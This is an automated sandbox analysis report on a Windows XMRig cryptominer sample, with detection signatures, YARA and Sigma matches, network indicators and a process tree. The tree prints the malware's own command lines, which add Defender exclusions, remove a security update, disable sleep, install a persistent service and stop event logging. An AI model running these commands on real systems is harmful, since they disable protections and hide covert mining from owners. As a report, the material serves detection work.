Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
WWhhc3A0rs.exe

Overview

General Information

Sample name:WWhhc3A0rs.exe
renamed because original name is a hash value
Original sample name:197aeec0c11ec28146e26e140584bf05adf81ac74af87448776a2cf5c698ec4f.exe
Analysis ID:1532624
MD5:5df14b213736e361758fec790bd16721
SHA1:019592d0ea29dd3037d8b0bd1bd65644aa02c74a
SHA256:197aeec0c11ec28146e26e140584bf05adf81ac74af87448776a2cf5c698ec4f
Tags:exeuser-Chainskilabs
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Stop EventLog
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
DNS related to crypt mining pools
Found strings related to Crypto-Mining
Loading BitLocker PowerShell Module
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Sample is not signed and drops a device driver
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses powercfg.exe to modify the power settings
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • WWhhc3A0rs.exe (PID: 3604 cmdline: "C:\Users\user\Desktop\WWhhc3A0rs.exe" MD5: 5DF14B213736E361758FEC790BD16721)
    • powershell.exe (PID: 2304 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 368 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 2488 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • powercfg.exe (PID: 5916 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 5712 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 2620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 4788 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 6492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 3700 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 4864 cmdline: C:\Windows\system32\sc.exe delete "VKWMZEFB" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7156 cmdline: C:\Windows\system32\sc.exe create "VKWMZEFB" binpath= "C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 4568 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 5776 cmdline: C:\Windows\system32\sc.exe start "VKWMZEFB" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • lwmyuxxpdkdz.exe (PID: 6732 cmdline: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exe MD5: 5DF14B213736E361758FEC790BD16721)
    • powershell.exe (PID: 5936 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 4328 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 1280 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • powercfg.exe (PID: 796 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 2620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 6532 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 4208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 1008 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 6500 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 6492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • conhost.exe (PID: 6508 cmdline: C:\Windows\system32\conhost.exe MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • conhost.exe (PID: 7064 cmdline: conhost.exe MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 4328 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000026.00000002.3375667988.000001D9F36EA000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    00000026.00000002.3375667988.000001D9F372C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      00000026.00000002.3375667988.000001D9F3695000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        00000026.00000002.3375667988.000001D9F36B1000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
          00000026.00000002.3365337021.0000000140001000.00000040.00000001.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            38.2.conhost.exe.140000000.0.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
              38.2.conhost.exe.140000000.0.unpackMacOS_Cryptominer_Xmrig_241780a1unknownunknown
              • 0x370008:$a1: mining.set_target
              • 0x362230:$a2: XMRIG_HOSTNAME
              • 0x364ba8:$a3: Usage: xmrig [OPTIONS]
              • 0x362208:$a4: XMRIG_VERSION
              38.2.conhost.exe.140000000.0.unpackMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
              • 0x3b5761:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
              38.2.conhost.exe.140000000.0.unpackMALWARE_Win_CoinMiner02Detects coinmining malwareditekSHen
              • 0x3b5fd8:$s1: %s/%s (Windows NT %lu.%lu
              • 0x3b9600:$s3: \\.\WinRing0_
              • 0x3671a8:$s4: pool_wallet
              • 0x3615d8:$s5: cryptonight
              • 0x3615e8:$s5: cryptonight
              • 0x3615f8:$s5: cryptonight
              • 0x361608:$s5: cryptonight
              • 0x361620:$s5: cryptonight
              • 0x361630:$s5: cryptonight
              • 0x361640:$s5: cryptonight
              • 0x361658:$s5: cryptonight
              • 0x361668:$s5: cryptonight
              • 0x361680:$s5: cryptonight
              • 0x361698:$s5: cryptonight
              • 0x3616a8:$s5: cryptonight
              • 0x3616b8:$s5: cryptonight
              • 0x3616c8:$s5: cryptonight
              • 0x3616e0:$s5: cryptonight
              • 0x3616f8:$s5: cryptonight
              • 0x361708:$s5: cryptonight
              • 0x361718:$s5: cryptonight

              Sigma Signatures

              Change of critical system settings

              barindex
              Sigma detected: Disable power options
              Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\Users\user\Desktop\WWhhc3A0rs.exe", ParentImage: C:\Users\user\Desktop\WWhhc3A0rs.exe, ParentProcessId: 3604, ParentProcessName: WWhhc3A0rs.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 5916, ProcessName: powercfg.exe

              System Summary

              barindex
              Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\WWhhc3A0rs.exe", ParentImage: C:\Users\user\Desktop\WWhhc3A0rs.exe, ParentProcessId: 3604, ParentProcessName: WWhhc3A0rs.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 2304, ProcessName: powershell.exe
              Sigma detected: Powershell Defender Exclusion
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\WWhhc3A0rs.exe", ParentImage: C:\Users\user\Desktop\WWhhc3A0rs.exe, ParentProcessId: 3604, ParentProcessName: WWhhc3A0rs.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 2304, ProcessName: powershell.exe
              Sigma detected: New Service Creation Using Sc.EXE
              Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\sc.exe create "VKWMZEFB" binpath= "C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "VKWMZEFB" binpath= "C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\WWhhc3A0rs.exe", ParentImage: C:\Users\user\Desktop\WWhhc3A0rs.exe, ParentProcessId: 3604, ParentProcessName: WWhhc3A0rs.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "VKWMZEFB" binpath= "C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exe" start= "auto", ProcessId: 7156, ProcessName: sc.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\WWhhc3A0rs.exe", ParentImage: C:\Users\user\Desktop\WWhhc3A0rs.exe, ParentProcessId: 3604, ParentProcessName: WWhhc3A0rs.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 2304, ProcessName: powershell.exe
              Sigma detected: Windows Processes Suspicious Parent Directory
              Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, CommandLine: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, ProcessId: 4328, ProcessName: svchost.exe

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Sigma detected: Stop EventLog
              Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\WWhhc3A0rs.exe", ParentImage: C:\Users\user\Desktop\WWhhc3A0rs.exe, ParentProcessId: 3604, ParentProcessName: WWhhc3A0rs.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 4568, ProcessName: sc.exe

              Suricata Signatures

              No Suricata rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Multi AV Scanner detection for domain / URL
              Source: xmr-eu1.nanopool.orgVirustotal: Detection: 5%Perma Link
              Multi AV Scanner detection for dropped file
              Source: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exeReversingLabs: Detection: 57%
              Source: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exeVirustotal: Detection: 61%Perma Link
              Multi AV Scanner detection for submitted file
              Source: WWhhc3A0rs.exeReversingLabs: Detection: 57%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability

              Bitcoin Miner

              barindex
              Yara detected Xmrig cryptocurrency miner
              Source: Yara matchFile source: 38.2.conhost.exe.140000000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000026.00000002.3375667988.000001D9F36EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000026.00000002.3375667988.000001D9F372C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000026.00000002.3375667988.000001D9F3695000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000026.00000002.3375667988.000001D9F36B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000026.00000002.3365337021.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: conhost.exe PID: 7064, type: MEMORYSTR
              DNS related to crypt mining pools
              Source: unknownDNS query: name: xmr-eu1.nanopool.org
              Found strings related to Crypto-Mining
              Source: conhost.exe, 00000026.00000002.3365337021.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
              Source: conhost.exeString found in binary or memory: cryptonight/0
              Source: conhost.exe, 00000026.00000002.3365337021.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: -o, --url=URL URL of mining server
              Source: conhost.exe, 00000026.00000002.3365337021.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
              Source: conhost.exe, 00000026.00000002.3365337021.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
              Source: conhost.exe, 00000026.00000002.3365337021.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
              Source: WWhhc3A0rs.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: lwmyuxxpdkdz.exe, 00000018.00000003.2185438730.000001CDABBB0000.00000004.00000001.00020000.00000000.sdmp, uoqzkgppgdee.sys.24.dr
              Source: global trafficTCP traffic: 192.168.2.6:49713 -> 51.15.65.182:10343
              Source: Joe Sandbox ViewIP Address: 51.15.65.182 51.15.65.182
              Source: Joe Sandbox ViewASN Name: OnlineSASFR OnlineSASFR
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: xmr-eu1.nanopool.org
              Source: conhost.exe, 00000026.00000002.3375667988.000001D9F372C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000026.00000002.3375667988.000001D9F36B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.cloudflare.com/origin_ca.crl
              Source: conhost.exe, 00000026.00000002.3375667988.000001D9F36B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.cloudflare.com/origin_ca.crl0
              Source: lwmyuxxpdkdz.exe, 00000018.00000003.2185438730.000001CDABBB0000.00000004.00000001.00020000.00000000.sdmp, uoqzkgppgdee.sys.24.drString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
              Source: lwmyuxxpdkdz.exe, 00000018.00000003.2185438730.000001CDABBB0000.00000004.00000001.00020000.00000000.sdmp, uoqzkgppgdee.sys.24.drString found in binary or memory: http://crl.globalsign.net/Root.crl0
              Source: lwmyuxxpdkdz.exe, 00000018.00000003.2185438730.000001CDABBB0000.00000004.00000001.00020000.00000000.sdmp, uoqzkgppgdee.sys.24.drString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
              Source: lwmyuxxpdkdz.exe, 00000018.00000003.2185438730.000001CDABBB0000.00000004.00000001.00020000.00000000.sdmp, uoqzkgppgdee.sys.24.drString found in binary or memory: http://crl.globalsign.net/primobject.crl0
              Source: conhost.exe, 00000026.00000002.3375667988.000001D9F36B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.cloudflare.com/origin_ca
              Source: conhost.exe, 00000026.00000002.3375667988.000001D9F36B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.cloudflare.com/origin_ca0
              Source: conhost.exe, 00000026.00000002.3365337021.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/docs/algorithms

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 38.2.conhost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 38.2.conhost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 38.2.conhost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
              Source: 00000026.00000002.3365337021.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: Process Memory Space: conhost.exe PID: 7064, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Uses powercfg.exe to modify the power settings
              Source: C:\Users\user\Desktop\WWhhc3A0rs.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\Windows\System32\conhost.exeProcess Stats: CPU usage > 49%
              Source: C:\Users\user\Desktop\WWhhc3A0rs.exeCode function: 0_2_00007FF71EB11394 NtAllocateUserPhysicalPages,0_2_00007FF71EB11394
              Source: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exeCode function: 24_2_00007FF701161394 NtManageHotPatch,24_2_00007FF701161394
              Source: C:\Windows\System32\conhost.exeCode function: 35_2_0000000140001394 NtReleaseWorkerFactoryWorker,35_2_0000000140001394
              Source: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exeFile created: C:\Windows\TEMP\uoqzkgppgdee.sysJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\__PSScriptPolicyTest_eoluthrv.kz2.ps1
              Source: C:\Users\user\Desktop\WWhhc3A0rs.exeCode function: 0_2_00007FF71EB13B500_2_00007FF71EB13B50
              Source: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exeCode function: 24_2_00007FF701163B5024_2_00007FF701163B50
              Source: C:\Windows\System32\conhost.exeCode function: 35_2_000000014000315035_2_0000000140003150
              Source: C:\Windows\System32\conhost.exeCode function: 35_2_00000001400026E035_2_00000001400026E0
              Source: Joe Sandbox ViewDropped File: C:\Windows\Temp\uoqzkgppgdee.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
              Source: C:\Users\user\Desktop\WWhhc3A0rs.exeCode function: String function: 00007FF71EB11394 appears 33 times
              Source: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exeCode function: String function: 00007FF701161394 appears 33 times
              Source: WWhhc3A0rs.exeStatic PE information: invalid certificate
              Source: 38.2.conhost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 38.2.conhost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
              Source: 38.2.conhost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
              Source: 00000026.00000002.3365337021.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: Process Memory Space: conhost.exe PID: 7064, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: uoqzkgppgdee.sys.24.drBinary string: \Device\WinRing0_1_2_0
              Source: classification engineClassification label: mal100.spyw.evad.mine.winEXE@57/12@1/1
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5360:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5412:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4208:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2620:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5764:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6492:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3416:120:WilError_03
